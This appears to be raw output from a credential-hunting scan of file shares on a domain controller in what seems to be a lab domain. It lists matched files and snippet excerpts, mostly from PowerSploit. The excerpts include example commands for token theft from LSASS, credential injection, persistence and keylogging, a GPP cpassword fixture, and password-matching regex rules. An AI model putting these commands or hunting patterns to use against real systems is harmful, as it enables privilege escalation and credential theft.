\ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\ \{\$UserName\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Changed\)\)\ \{\$Changed\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$NewName\)\)\ \{\$NewNa [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Green}<KeepNameContainsGreen|R|credential|19.8kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-VaultCredential.ps1) Get-VaultCredential.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Green}<KeepNameContainsGreen|R|credential|442.9kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Invoke-CredentialInjection.ps1) Invoke-CredentialInjection.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Green}<KeepNameContainsGreen|R|credential|1.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-VaultCredential.ps1xml) Get-VaultCredential.ps1xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|442.9kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Invoke-CredentialInjection.ps1) is\ Kerberos\.\ Msv1_0\ can\ be\ specified\ but\ should\ only\ be\ used\ for\ local\ accounts\ \(which\ can't\ use\ kerberos\)\.\n\n\t\n\ \ \ \ \.EXAMPLE\n\n\ \ \ \ Invoke-CredentialInjection\ -DomainName\ "demo"\ -UserName\ "administrator"\ -Password\ "Password1"\ -NewWinLogon\n\n\ \ \ \ Creates\ a\ new\ winlogon\ process\ \(as\ the\ SYSTEM\ account\)\ and\ creates\ a\ logon\ from\ within\ the\ process\ as\ demo\\administrator\.\ The\ logon\ will\ default\ to\n\ \ \ \ RemoteI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|92.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Invoke-TokenManipulation.ps1) sing\ the\ primary\ token\ of\ LSASS\.exe\.\ This\ pipes\ the\ output\ of\ Get-Process\ to\ the\ "-Process"\ parameter\ of\ the\ script\.\n\n\.EXAMPLE\n\n\(Get-Process\ wininit\ \|\ Invoke-TokenManipulation\ -CreateProcess\ "cmd\.exe"\ -PassThru\)\.WaitForExit\(\)\n\nSpawns\ cmd\.exe\ using\ the\ primary\ token\ of\ LSASS\.exe\.\ Then\ holds\ the\ spawning\ PowerShell\ session\ until\ that\ process\ has\ exited\.\n\n\.EXAMPLE\n\nGet-Process\ wininit\ \|\ Invoke-TokenM [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|586.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Privesc\PowerUp.ps1) ing\[]]\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \$Name,\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$UserName\ =\ 'john',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ 'Password123!',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$LocalGroup\ =\ 'Administrators',\n\n\ \ \ \ \ \ \ \ \[Management\.Automation\.PSCredential]\n\ \ \ \ \ \ \ \ \[Management\.Automation\.Cre [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|38.2kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Persistence\Persistence.psm1) \ -OnIdle\n\$UserOptions\ =\ New-UserPersistenceOption\ -ScheduledTask\ -OnIdle\nAdd-Persistence\ -ScriptBlock\ \$RickRoll\ -ElevatedPersistenceOption\ \$ElevatedOptions\ -UserPersistenceOption\ \$UserOptions\ -Verbose\ -PassThru\ \|\ Out-EncodedCommand\ \|\ Out-File\ \.\\EncodedPersistentScript\.ps1\n\nDescription\n-----------\nCreates\ a\ script\ containing\ the\ contents\ of\ the\ provided\ scriptblock\ that\ when\ executed\ with\ the\ '-Per [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPsCredentials|R|-SecureString|752.2kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Recon\PowerView.ps1) \n"C:\\Windows\\example\.ini"\ \|\ Get-IniContent\ -OutputObject\n\nOutputs\ the\ \.ini\ details\ as\ a\ proper\ nested\ PSObject\.\n\n\.EXAMPLE\n\n"C:\\Windows\\example\.ini"\ \|\ Get-IniContent\n\n\.EXAMPLE\n\n\$SecPassword\ =\ ConvertTo-SecureString\ 'Password123!'\ -AsPlainText\ -Force\n\$Cred\ =\ New-Object\ System\.Management\.Automation\.PSCredential\('TESTLAB\\dfm\.a',\ \$SecPassword\)\nGet-IniContent\ -Path\ \\\\PRIMARY\.testlab\.local\\C\$\\Temp\\GptTmp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|586.5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Privesc\PowerUp.ps1) ing\[]]\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \$Name,\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$UserName\ =\ 'john',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Password\ =\ 'Password123!',\n\n\ \ \ \ \ \ \ \ \[ValidateNotNullOrEmpty\(\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$LocalGroup\ =\ 'Administrators',\n\n\ \ \ \ \ \ \ \ \[Management\.Automation\.PSCredential]\n\ \ \ \ \ \ \ \ \[Management\.Automation\.Cre [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPsCredentials|R|-SecureString|5kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\ScriptModification\Out-EncryptedScript.ps1) n\ be\ any\ string\ value\.\r\n\r\n\.PARAMETER\ InitializationVector\r\n\r\nSpecifies\ a\ 16-character\ the\ initialization\ vector\ to\ be\ used\.\ This\r\nis\ randomly\ generated\ by\ default\.\r\n\r\n\.EXAMPLE\r\n\r\n\$Password\ =\ ConvertTo-SecureString\ 'Password123!'\ -AsPlainText\ -Force\r\nOut-EncryptedScript\ \.\\Naughty-Script\.ps1\ \$Password\ salty\r\n\r\nDescription\r\n-----------\r\nEncrypt\ the\ contents\ of\ this\ file\ with\ a\ password\ and\ salt\.\ This [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|36.8kB|2025-05-01 16:09:14Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit.build.ps1) e\ project\.\nAdd-BuildTask\ ImportModuleManifest\ \{\n\ \ \ \ Write-Build\ White\ '\ \ \ \ \ \ Attempting\ to\ load\ the\ project\ module\.'\n\ \ \ \ \$Script:moduleCommandTable\ =\ &\ \(Import-Module\ \$Script:ModuleManifestFile\ -Force\ -PassThru\)\ \{\ \$CommandTable\ }\n\ \ \ \ Write-Build\ Green\ "\ \ \ \ \ \ \.\.\.\$Script:ModuleName\ imported\ successfully"\n}\n\n\#\ Synopsis:\ Clean\ and\ reset\ Artifacts\ directory\.\nAdd-BuildTask\ Clean\ \{\n\ \ \ \ Write-Build\ White\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPsCredentials|R|-SecureString|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) rUp'\ not\ created\."\n\ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \$Null\ =\ \$\(net\ user\ PowerUp\ /delete\ >\$Null\ 2>&1\)\n\ \ \ \ }\n\n\ \ \ \ It\ 'Should\ accept\ a\ credential\ object\.'\ \{\n\ \ \ \ \ \ \ \ \$Username\ =\ 'PowerUp123'\n\ \ \ \ \ \ \ \ \$Password\ =\ ConvertTo-SecureString\ 'PASSword123!'\ -AsPlaintext\ -Force\ \n\ \ \ \ \ \ \ \ \$Credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$Username,\ \$Password\n\n\ \ \ \ \ \ \ \ \$Output\ =\ Invoke-Serv [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) 5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"\ name="SuperSecretBackdoor"\ image="0"\ changed="2013-04-25\ 18:36:07"\ uid="\{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}"><Properties\ action="C"\ fullName=""\ description=""\ cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3"\ changeLogon="0"\ noChange="0"\ neverExpires="1"\ acctDisabled="0"\ userName="SuperSecretBackdoor"/></User></Groups>'\n\ \ \ \ \ \ \ \ \$Gr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|54.6kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Tests\Privesc.tests.ps1) 5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"\ name="SuperSecretBackdoor"\ image="0"\ changed="2013-04-25\ 18:36:07"\ uid="\{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}"><Properties\ action="C"\ fullName=""\ description=""\ cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3"\ changeLogon="0"\ noChange="0"\ neverExpires="1"\ acctDisabled="0"\ userName="SuperSecretBackdoor"/></User></Groups>'\n\ \ \ \ \ \ \ \ \$Gr [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:08Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|2.4kB|2025-05-01 16:08:45Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Tests\Exfiltration.tests.ps1) MP\)\\key\.log"\ }\n\ \ \ \ \$WindowTitle\ =\ \(Get-Process\ -Id\ \$PID\)\.MainWindowTitle\n\ \ \ \ \n\ \ \ \ \$Shell\ =\ New-Object\ -ComObject\ wscript\.shell\n\ \ \ \ \$Shell\.AppActivate\(\$WindowTitle\)\n\ \ \ \ \n\ \ \ \ \$KeyLogger\ =\ Get-Keystrokes\ -PassThru\n\ \ \ \ Start-Sleep\ -Seconds\ 1\n\n\ \ \ \ \$Shell\.SendKeys\("Pester`b`b`b`b`b`b"\)\n\ \ \ \ \$KeyLogger\.Dispose\(\)\n\n\ \ \ \ It\ 'Should\ output\ to\ file'\ \{\ Test-Path\ "\$\(\$env:TEMP\)\\key\.log"\ \|\ Should\ Be\ \$true\ }\n\ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:09Z [File] {Green}<KeepNameContainsGreen|R|credential|409B|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\C$\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_credential_dumping_via_vss.xml) include_credential_dumping_via_vss.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:09Z [File] {Green}<KeepNameContainsGreen|R|passw|374B|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\C$\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_disable_password_change.xml) include_disable_password_change.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:09Z [File] {Green}<KeepNameContainsGreen|R|credential|1.2kB|2025-05-01 16:09:37Z>(\\DC01.inlanefreight.local\C$\IT\Tools\sysmon-modular-master\12_13_14_registry_event\include_windows_credential_providers.xml) include_windows_credential_providers.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:11Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.9kB|2018-09-15 09:08:02Z>(\\DC01.inlanefreight.local\C$\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1) ow\ have\ all\ the\ data\ to\ execute\ integrator\.exe\ to\ migrate\ the\ license\.\ Execute\ the\ program\ now\.\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$integratorProcess\ =\ Start-Process\ \$integratorFileFullName\ \$integratorArguments\ -Passthru\ -Wait\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$integratorProcess\.ExitCode\ -eq\ 0\)\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$migrationSuccessful\ =\ \$true\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:11Z [File] {Green}<KeepNameContainsGreen|R|credential|3.3kB|2018-09-15 07:13:55Z>(\\DC01.inlanefreight.local\C$\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml) RoamingCredentialSettings.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Green}<KeepNameContainsGreen|R|passw|3.2kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\docs\Recon\Set-DomainUserPassword.md) Set-DomainUserPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Green}<KeepNameContainsGreen|R|passw|1.9kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\docs\Privesc\Get-CachedGPPPassword.md) Get-CachedGPPPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Green}<KeepNameContainsGreen|R|passw|2.6kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\docs\Privesc\Get-SiteListPassword.md) Get-SiteListPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\ImportsFirst.ps1) ModuleName\ =\ 'Microsoft\.PowerShell\.Utility';\ Guid\ =\ '1da87e53-152b-403e-98dc-74d7b4d63d59';\ ModuleVersion\ =\ '1\.0'\ }\n\ \ \ \ \ \ \ \ \)\n\ \ \ \ \ \ \ \ \(Import-Module\ -FullyQualifiedName\ \$RequiredModules\ -Global\ -Force\ -PassThru\ -ErrorAction\ Stop\)\.ExportedCommands\.Values\ \|\ &\ \{\ process\ \{\ \$CommandTable\.Add\(\$_\.Name,\ \$_\)\ }\ }\n\ \ \ \ }\n\n\ \ \ \ \#\ Set\ required\ variables\ to\ ensure\ module\ functionality\.\n\ \ \ \ New-Variable\ -Name\ Erro [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|13kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\examples\WinSCP\Invoke-AppDeployToolkit.ps1) '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\n\ \ \ \ try\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @PSBoundParameters\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|3.6kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\examples\ServiceUI\Invoke-ServiceUI.ps1) \ \ \ \ \ \ \ \#\ Start-Process\ is\ used\ here\ otherwise\ script\ does\ not\ wait\ for\ completion\n\ \ \ \ \ \ \ \ \$Process\ =\ Start-Process\ -FilePath\ '\.\\Invoke-AppDeployToolkit\.exe'\ -ArgumentList\ \$Arguments\ -NoNewWindow\ -Wait\ -PassThru\n\ \ \ \ \ \ \ \ \$ExitCode\ =\ \$Process\.ExitCode\n\ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \#\ Using\ Start-Process\ with\ ServiceUI\ results\ in\ Error\ Code\ 5\ \(Access\ Denied\)\n\ \ \ \ \ \ \ \ &"\.\\ServiceUI_\$Architecture\.exe"\ -process:exp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:12Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|12.2kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\examples\VLC\Invoke-AppDeployToolkit.ps1) '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\n\ \ \ \ try\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @PSBoundParameters\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Green}<KeepNameContainsGreen|R|passw|1.9kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\docs\Privesc\Get-CachedGPPPassword.md) Get-CachedGPPPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Green}<KeepNameContainsGreen|R|passw|2.6kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\docs\Privesc\Get-SiteListPassword.md) Get-SiteListPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Green}<KeepNameContainsGreen|R|passw|3.2kB|2025-05-01 16:08:46Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\docs\Recon\Set-DomainUserPassword.md) Set-DomainUserPassword.md [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|3.6kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\examples\ServiceUI\Invoke-ServiceUI.ps1) \ \ \ \ \ \ \ \#\ Start-Process\ is\ used\ here\ otherwise\ script\ does\ not\ wait\ for\ completion\n\ \ \ \ \ \ \ \ \$Process\ =\ Start-Process\ -FilePath\ '\.\\Invoke-AppDeployToolkit\.exe'\ -ArgumentList\ \$Arguments\ -NoNewWindow\ -Wait\ -PassThru\n\ \ \ \ \ \ \ \ \$ExitCode\ =\ \$Process\.ExitCode\n\ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \#\ Using\ Start-Process\ with\ ServiceUI\ results\ in\ Error\ Code\ 5\ \(Access\ Denied\)\n\ \ \ \ \ \ \ \ &"\.\\ServiceUI_\$Architecture\.exe"\ -process:exp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|12.2kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\examples\VLC\Invoke-AppDeployToolkit.ps1) '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\n\ \ \ \ try\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @PSBoundParameters\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|13kB|2025-05-01 16:09:02Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\examples\WinSCP\Invoke-AppDeployToolkit.ps1) '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\n\ \ \ \ try\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @PSBoundParameters\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\ImportsFirst.ps1) ModuleName\ =\ 'Microsoft\.PowerShell\.Utility';\ Guid\ =\ '1da87e53-152b-403e-98dc-74d7b4d63d59';\ ModuleVersion\ =\ '1\.0'\ }\n\ \ \ \ \ \ \ \ \)\n\ \ \ \ \ \ \ \ \(Import-Module\ -FullyQualifiedName\ \$RequiredModules\ -Global\ -Force\ -PassThru\ -ErrorAction\ Stop\)\.ExportedCommands\.Values\ \|\ &\ \{\ process\ \{\ \$CommandTable\.Add\(\$_\.Name,\ \$_\)\ }\ }\n\ \ \ \ }\n\n\ \ \ \ \#\ Set\ required\ variables\ to\ ensure\ module\ functionality\.\n\ \ \ \ New-Variable\ -Name\ Erro [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:13Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.9kB|2018-09-15 09:08:02Z>(\\DC01.inlanefreight.local\C$\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1) ow\ have\ all\ the\ data\ to\ execute\ integrator\.exe\ to\ migrate\ the\ license\.\ Execute\ the\ program\ now\.\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$integratorProcess\ =\ Start-Process\ \$integratorFileFullName\ \$integratorArguments\ -Passthru\ -Wait\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$integratorProcess\.ExitCode\ -eq\ 0\)\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$migrationSuccessful\ =\ \$true\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\r\n\ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Green}<KeepNameContainsGreen|R|credential|3.3kB|2018-09-15 07:13:55Z>(\\DC01.inlanefreight.local\C$\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml) RoamingCredentialSettings.xml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|1.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-context.xml.ps1) h="Container"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ type="javax\.sql\.DataSource"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxTotal="100"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxIdle="30"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxWaitMillis="10000"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ username="dbuser"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ password="dbpassword"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ driverClassName="com\.mysql\.jdbc\.Driver"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ url="jdbc:mysql://localhost:3306/mydb"/>\r\n</Context>\r\n\r\n\#> [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|12kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-app.config.ps1) web>\r\n\ \ \ \ <compilation\ debug="true"\ />\r\n\ \ \ \ <authentication\ mode="Forms">\r\n\ \ \ \ \ \ <forms\ loginUrl="login\.aspx"\ timeout="30">\r\n\ \ \ \ \ \ \ \ <credentials\ passwordFormat="Clear">\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user1"\ password="password1"\ />\r\n\ \ \ \ \ \ \ \ \ \ <user\ name="user2"\ password="password2"\ />\r\n\ \ \ \ \ \ \ \ </credentials>\r\n\ \ \ \ \ \ </forms>\r\n\ \ \ \ </authentication>\r\n\ \ \ \ <customErrors\ mode="Off"\ />\r\n\ \ </system\.web>\r\n\r\n\ \ <!-- [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:14Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|1.6kB|2025-05-01 16:37:04Z>(\\DC01.inlanefreight.local\C$\Users\Public\PowerHuntShares\Scripts\ConfigParsers\parser-context.xml.ps1) h="Container"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ type="javax\.sql\.DataSource"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxTotal="100"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxIdle="30"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ maxWaitMillis="10000"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ username="dbuser"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ password="dbpassword"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ driverClassName="com\.mysql\.jdbc\.Driver"\r\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ 